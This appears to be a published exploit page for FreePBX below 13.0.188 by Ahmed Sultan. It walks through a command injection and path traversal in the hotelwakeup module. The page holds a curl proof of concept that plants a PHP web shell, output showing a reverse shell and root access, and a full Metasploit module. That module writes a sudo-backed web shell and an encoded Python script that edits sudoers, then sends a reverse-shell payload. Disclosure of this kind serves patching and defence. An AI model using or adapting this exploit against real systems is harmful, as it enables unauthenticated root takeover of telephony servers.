扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 |
#Title : Freepbx < 13.0.188 , Remote root exploit #Vulnerable software : Freepbx < 13.0.188 #Author : Ahmed Sultan (0x4148) #Email : 0x4148@gmail.com #Current software status : patch released #Vendor : Sangoma <freepbx.org> =begin Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking Technical details Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php Line 102 : public function generateCallFile($foo) { ............................... if (empty($foo['filename'])) { $foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable } ........................... // Delete any old .call file with the same name as the one we are creating. if(file_exists($outfile) ) { unlink($outfile); } // Create up a .call file, write and close $wuc = fopen($tempfile, 'w'); fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" ); fputs( $wuc, "maxretries: ".$foo['maxretries']."\n"); fputs( $wuc, "retrytime: ".$foo['retrytime']."\n"); fputs( $wuc, "waittime: ".$foo['waittime']."\n"); fputs( $wuc, "callerid: ".$foo['callerid']."\n"); fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n");<<<<<---------------------Vulnerable fputs( $wuc, "application: ".$foo['application']."\n"); fputs( $wuc, "data: ".$foo['data']."\n"); fclose( $wuc ); .......................... The ext value can be manipulated by the attacker to change the output file path the language value can be manipulated by the attacket to load in malicious contents Function is called at Line 94 : public function addWakeup($destination, $time, $lang) { $date = $this->getConfig();// module config provided by user $this->generateCallFile(array( "time"=> $time, "date" => 'unused', "ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field] "language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code] "maxretries" => $date['maxretries'], "retrytime" => $date['retrytime'], "waittime" => $date['waittime'], "callerid" => $date['cnam']." <".$date['cid'].">", "application" => 'AGI', "data" => 'wakeconfirm.php', )); } addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command Line 60 : switch($_REQUEST['command']) { case "savecall": if(empty($_POST['language'])) { $lang = 'en'; //default to English if empty } else { $lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<=========================== } ............................................ if ($badtime){ // abandon .call file creation and pop up a js alert to the user return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup))); } else { $this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<======================= return array("status" => true); } ................................. POC : [0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>" {"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}# The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call the server will ignore.call extn and will execute the php [0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call" channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm maxretries: 3 retrytime: 60 waittime: 60 callerid: Wake Up Calls <*68> set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux uid=499(asterisk) gid=498(asterisk) groups=498(asterisk) application: AGI data: wakeconfirm.php Privelage can be escalated via adding the asterisk user to sudoers which can be done manually then echo a > /var/spool/asterisk/sysadmin/amportal_restart sleeping for few seconds then sudo bash -i MSF OUTPUT msf > use exploit/fpbx msf exploit(fpbx) > set RHOST 68.170.92.50 RHOST => 68.170.92.50 msf exploit(fpbx) > set RPORT 8080 RPORT => 8080 msf exploit(fpbx) > exploit [*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443 [*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . . [*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload [+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed [*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success> id uid=0(root) gid=0(root) groups=0(root) sh -i sh: no job control in this shell sh-4.1# pwd pwd /var/www/html sh-4.1# whoami whoami root sh-4.1# =end ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name'=> 'FreePBX < 13.0.188.1 Remote root exploit', 'Description' => ' This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup ', 'License' => MSF_LICENSE, 'Author'=> [ 'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module ], 'References'=> [ "NA" ], 'Payload' => { 'Compat' => { 'PayloadType'=> 'cmd', 'RequiredCmd'=> 'perl telnet python' } }, 'Platform' => %w(linux unix), 'Arch' => ARCH_CMD, 'Targets'=> [['Automatic', {}]], 'Privileged' => 'false', 'DefaultTarget'=> 0, 'DisclosureDate' => 'Sep 27 2016')) end def print_status(msg = '') super("#{rhost}:#{rport} - #{msg}") end def print_error(msg = '') super("#{rhost}:#{rport} - #{msg}") end def print_good(msg = '') super("#{rhost}:#{rport} - #{msg}") end # Application Check def check res = send_request_cgi( 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, 'admin', 'ajax.php'), 'headers' => { 'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff" }, 'vars_post' => { 'module' => 'hotelwakeup', 'command' => 'savecall' } ) unless res vprint_error('Connection timed out.') end if res.body.include? "Referrer" vprint_good("Hotelwakeup module detected") return Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit vprint_status('Sending payload . . .') pwn = send_request_cgi( 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, 'admin', 'ajax.php'), 'headers' => { 'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall", 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 'User-agent' => "mostahter ;)" }, 'vars_post' => { 'module' => 'hotelwakeup', 'command' => 'savecall', 'day' => 'now', 'time' => '+1 week', 'destination' => '/../../../../../../var/www/html/0x4148.php', 'language' => '<?php echo "0x4148@r1z";if($_GET[\'r1zcmd\']!=\'\'){system("sudo ".$_GET[\'r1zcmd\']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>', } ) #vprint_status("#{pwn}") vprint_status('Trying to execute payload <taking around 20 seconds in case of success>') escalate = send_request_cgi( 'method' => 'GET', 'uri'=> normalize_uri(target_uri.path, '0x4148.php.call'), 'vars_get' => { '0x4148' => "r1z" } ) if escalate.body.include? "0x4148@r1z" vprint_good("Payload executed") vprint_status("Spawning root shell") killit = send_request_cgi( 'method' => 'GET', 'uri'=> normalize_uri(target_uri.path, '0x4148.php.call'), 'vars_get' => { 'r1zcmd' => "#{payload.encoded}" } ) else vprint_error("Exploitation Failed") end end end |
体验盒子
